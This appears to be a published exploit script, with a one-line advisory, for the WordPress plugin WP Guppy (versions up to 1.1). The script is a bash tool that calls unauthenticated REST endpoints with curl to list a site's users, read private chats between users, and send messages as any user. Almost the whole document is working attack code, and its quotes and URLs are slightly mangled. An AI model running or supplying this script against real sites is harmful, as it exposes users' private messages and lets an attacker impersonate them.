The plugin does not have any authorisation in some of the REST API endpoints, allowing any user to call them and could lead to sensitive information disclosure, such as usernames and chats between users, as well as be able to send messages as an arbitrary user
#!/bin/bash #Exploit Title: Wordpress Plugin WP Guppy A live chat - WP-JSON API Sensitive Information Disclosure #Exploit Author: Keyvan Hardani #Date: 22/11/2021 #Vendor Homepage: https://wp-guppy.com/ #Version: up to 1.1 #Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2 #Usage ./exploit.sh -h Help() { # Display Help echo “Usage” echo echo “Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure” echo echo “Option 1: Get all users ( ./exploit.sh 1 domain.com)” echo “Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507” echo “Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493” echo “-h Print this Help.” echo } while getopts “:h” option; do case $option in h) # display Help Help exit;; esac done if [ $1 == 1 ] then curl -s --url “https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset;=0&search;=” | python -m json.tool fi if [ $1 == 2 ] then curl -s -X POST --url “https://$2/wp-json/guppy/v2/send-guppy-message” --data ‘{“receiverId”:"’$3’“,“userId”:”‘$4’“,“guppyGroupId”:”“,“chatType”:1,“message”:“test”,“replyTo”:”“,“latitude”:”“,“longitude”:”“,“messageType”:0,“messageStatus”:0,“replyId”:”",“timeStamp”:1637583213,“messageSentTime”:“November 22, 2021”,“metaData”:{“randNum”:5394},“isSender”:true}’ -H ‘Content-Type: application/json’| python -m json.tool fi if [ $1 == 3 ] then curl -s --url “https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId;=$3&userId;=$4&chatType;=1” | python -m json.tool fi